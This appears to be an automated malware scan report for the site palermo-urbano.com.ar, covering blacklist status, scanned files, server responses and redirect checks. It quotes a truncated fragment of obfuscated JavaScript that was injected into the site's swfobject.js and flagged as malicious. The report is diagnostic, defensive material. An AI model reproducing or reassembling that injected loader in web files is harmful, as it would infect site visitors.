Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=palermo-urbano.com.ar
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.palermo-urbano.com.ar/ | 200 OK Content-Length: 6949 Content-Type: text/html | clean |
http://www.palermo-urbano.com.ar/Scripts/swfobject.js | 200 OK Content-Length: 11315 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) iyr="s"+"p"+"li"+"t";ghr=window;doyzq="dy";qvr=document;mqecvu="0x";kdftts=(5-3-1);try{++(qvr.body)}catch(pgdmr){rkq=false;try{}catch(aeid){rkq=21;}if(1){dkm="17:5d:6c:65:5a:6b:60:66:65:17:61:67:6c:6c:6d:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a: Antivirus reports:
| ||
http://www.palermo-urbano.com.ar/test404page.js | HTTP/1.1 302 Object moved Cache-Control: private Date: Sat, 17 Jan 2015 23:22:30 GMT Location: Brook Server: Microsoft-IIS/7.0 Content-Length: 126 Content-Type: text/html Set-Cookie: ASPSESSIONIDACADTCSQ=BIFLFHHBKNJCIJOOKPEPHIMI; path=/ X-Powered-By: ASP.NET | clean |
http://www.palermo-urbano.com.ar/brook | HTTP/1.1 302 Object moved Cache-Control: private Date: Sat, 17 Jan 2015 23:22:30 GMT Location: Brook Server: Microsoft-IIS/7.0 Content-Length: 126 Content-Type: text/html Set-Cookie: ASPSESSIONIDACADTCSQ=CIFLFHHBPOFCJLHMGEAEOMJD; path=/ X-Powered-By: ASP.NET | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: palermo-urbano.com.ar
Result:
GET / HTTP/1.1
Host: palermo-urbano.com.ar
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: palermo-urbano.com.ar
Referer: http://www.google.com/search?q=palermo-urbano.com.ar
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: palermo-urbano.com.ar
Referer: http://www.google.com/search?q=palermo-urbano.com.ar
Result:
The result is similar to the first query. There are no suspicious redirects found.